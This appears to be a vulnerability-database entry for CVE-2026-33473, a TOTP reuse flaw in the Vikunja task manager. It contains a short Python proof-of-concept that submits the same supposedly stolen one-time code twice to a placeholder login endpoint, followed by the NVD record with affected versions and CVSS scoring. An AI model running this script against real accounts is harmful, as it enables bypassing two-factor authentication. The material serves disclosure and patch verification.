CVE-2026-33473

import requests import time # Conceptual Proof of Concept (PoC) for CVE-2026-33473 # This script demonstrates the reuse of a TOTP code within the validity window. TARGET_URL = "https://example.com/api/v1/login" USERNAME = "[email protected]" PASSWORD = "user_password" # Assume this TOTP code was intercepted or stolen STOLEN_TOTP = "123456" def login_with_totp(totp_code): session = requests.Session() payload = { "username": USERNAME, "password": PASSWORD, "totp_passcode": totp_code } response = session.post(TARGET_URL, json=payload) return response.status_code == 200 print("[*] Attempting first login with TOTP:", STOLEN_TOTP) if login_with_totp(STOLEN_TOTP): print("[+] Login 1 successful.") else: print("[-] Login 1 failed.") exit() print("[*] Attempting second login with SAME TOTP:", STOLEN_TOTP) if login_with_totp(STOLEN_TOTP): print("[+] Login 2 successful. TOTP code was reused!") print("[!] Vulnerability confirmed.") else: print("[-] Login 2 failed. System may be patched.")

{"cve": {"id": "CVE-2026-33473", "sourceIdentifier": "[email protected]", "published": "2026-03-24T16:16:33.710", "lastModified": "2026-03-27T16:53:32.720", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vikunja is an open-source self-hosted task management platform. Starting in version 0.13 and prior to version 2.2.1, any user that has enabled 2FA can have their TOTP reused during the standard 30 second validity window. Version 2.2.1 patches the issue."}, {"lang": "es", "value": "Vikunja es una plataforma de gestión de tareas de código abierto autoalojada. A partir de la versión 0.13 y antes de la versión 2.2.1, cualquier usuario que haya habilitado 2FA puede ver su TOTP reutilizado durante la ventana de validez estándar de 30 segundos. La versión 2.2.1 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.13", "versionEndExcluding": "2.2.1", "matchCriteriaId": "A9EDB458-A25F-4E79-A8D5-340826D95EB6"}]}]}], "references": [{"url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-p747-qc5p-773r", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://vikunja.io/changelog/vikunja-v2.2.0-was-released", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://vikunja.io/changelog/vikunja-v2.2.2-was-released", "source": "[email protected]", "tags": ["Release Notes"]}]}}